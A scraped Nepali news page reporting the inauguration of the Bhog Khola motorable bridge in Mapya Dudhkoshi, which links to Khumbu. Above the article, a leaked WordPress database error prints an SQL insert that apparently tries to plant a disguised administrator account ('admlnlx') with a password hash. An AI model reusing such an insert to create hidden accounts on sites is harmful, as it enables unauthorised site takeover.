WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BAVxcb4BgRf1d5ebjvBjGAUgRlonjB0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-12 22:50:11', '', 'admlnlx', 'admlnlx')

माप्यदुधकोशीको भोगखोलामा मोटरेबल पुल उद्घाटन – Gaule Khabar

माप्यदुधकोशीको भोगखोलामा मोटरेबल पुल उद्घाटन

माप्यदुधकोशीको भोगखोलामा मोटरेबल पुल उद्घाटन

माप्यदुधकोशीबाट खुम्बु पासाङल्हामु जोड्ने दोश्रो मोटरेबल पुलको उद्घाटन गरिएको छ ।

माप्यदुधकोशी गाउँपालिकाको लगानीमा वडा नं २ को भोग खोलामा निर्मित सो मोटरेबल पुलको आईतवार उद्घाटन गरिएको हो।प्रमुख अतिथि प्रतिनिधिसभा सदस्य मानबीर राई,कोशी प्रदेशका पूर्बमन्त्री तथा प्रदेशसभा सदस्य बुद्धिकुमार राजभण्डारी,माप्य तथा खुम्बु पासाङल्हामु गाउँपालिका अध्यक्षद्वय क्रमशः बुद्धिकिरण राई र मिङमाछिरी शेर्पा तथा नेचासल्यान गाउँपालिकाका पूर्ब अध्यक्ष डुफ कुमार बास्तोला र गाउँपालिका उपाध्यक्ष गौरव राईले रिवन काटेर सो पुलको उद्घाटन गरेका थिए।

माप्य दुधकोशी गाउँपालिकाले चालु र गत आर्थिक बर्षमा बिनियोजन गरेको २ करोड ७३ लाख रुपैयाँको कुल लागतमा निर्माण सम्पन्न भएको पुल निर्माणको काम गत बर्षबाट सुरु भएको थियो।दुधकोशीको ओर्लाङघाटमा निर्मित माप्य-खुम्बु मितेरी पुलपछि मुलुककै प्रमुख पर्यटीय गन्तव्य सगरमाथा क्षेत्र जोड्ने भोगखोला मोटरेबल पुल दोश्रो महत्त्वपूर्ण सडक हो।

भोगखोलामा मोटरेबल पुल नहुंदा जेठदेखि कार्तिकसम्मका पाँच महिना सवारीसाधन प्रत्यक्ष सञ्चालनमा समस्या हुँदै आएको थियो।
यो पुलको उद्घाटनले माप्यदुधकोशीका ५ र सिंगो खुम्बु पासाङल्हामु गाउँपालिकाका सम्पूर्ण वडाहरु प्रत्यक्ष लाभान्वित हुने स्थानीयको भनाई छ।

माप्यदुधकोशी गाउँपालिका अध्यक्ष बुद्धिकिरण राईको सक्रियतामा निर्माण भएको सो पुल उद्घाटनपछि सवारी आवागमनको चाप बढ्ने र १२ महिना यसले निरन्तरता पाउँदा खुम्बु क्षेत्रमा महंगी निकै घट्ने भन्दै खुम्बुबासीहरु अत्यन्तै हर्षित रहेको खुम्बु पासाङल्हामू गाउँपालिका प्रबक्ता लाक्पाछिरी शेर्पाले बताए।

उद्घाटनपछि आयोजना गरिएको कार्यक्रमलाई सम्बोधन गर्ने बक्ताहरुले भोगखोला पुल निर्माण माप्य र खुम्बुको बिकास र समृद्धिका लागि कोसेढुंगा भएको बताउँदै माप्य दुधकोशी गाउँपालिकाको समृद्धि र बिकासका लागि अध्यक्ष राईले खेलेको भूमिका अन्य जन प्रतिनिधिका लागि अनुकरणीय रहेको धारणा व्यक्त गरेका थिए।

माप्य दुधकोशी गाउँपालिका अध्यक्ष बुद्धिकिरण राईको अध्यक्षतामा सम्पन्न कार्यक्रममा प्रमुख अतिथि प्रतिनिधिसभा सदस्य एबम् नेकपा एमालेका केन्द्रीय सदस्य राई,बिशेष अतिथि पूर्बमन्त्री एबम् प्रदेशसभा सदस्य राजभण्डारी,खुम्बु पासाङल्हामु गाउँपालिका अध्यक्ष शेर्पा,नेचासल्यान गाउँपालिकाका पूर्ब अध्यक्ष एबम नेकपा एमाले जिल्ला कमिटी अध्यक्ष बास्तोला,प्रबक्ता लाक्पाछिरी, माप्य उपाध्यक्ष राई र गाउँपालिकाका निमित्त प्रमुख प्रशासकीय अधिकृत जितेन्द्र यादवले आ-आफ्नो धारणा व्यक्त गरेका थिए।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका